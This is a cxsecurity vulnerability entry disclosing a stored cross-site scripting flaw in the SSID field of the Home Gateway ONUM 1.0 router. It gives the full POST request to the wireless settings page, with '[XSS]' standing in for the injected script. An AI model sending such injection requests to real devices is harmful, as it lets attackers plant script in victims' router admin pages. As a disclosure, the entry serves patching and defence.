Home Gateway ONUM 1.0 - Cross-Site Scripting

2019.01.15
ir SajjadBnz (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Home Gateway ONUM 1.0 - Cross-Site Scripting #Date: 2019-01-15 #Exploit Author: SajjadBnz #My Email: blackwolf@post.com #Device Name: ONU1GERW #Model ID: 150R #Hardware Version: V1.0 #Software Version: V2.1.2_X000 #Serial Number: 1709000455 #Build Information: uild.0454.170914 [+] Overview: ============= Stored XSS in SSID Field- Stored XSS Attacks Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS. [+] Headers: ============= POST: /net_wlan_basic_user_11n.asp User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://117.212.241.74/net_wlan_basic_user_11n.asp Content-Type: application/x-www-form-urlencoded Content-Length: 183 Connection: keep-alive Upgrade-Insecure-Requests: 1 POST DATA : wlanEnabled=ON&select_2g5g=on&band=10&ssid=[XSS]&chanwid=2&chan=0&txRate=0&txpower=0&shortGI0=off&wmm=on&submit-url=/net_wlan_basic_11n.asp&wlan_idx=0&basicrates=496&operrates=4095


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top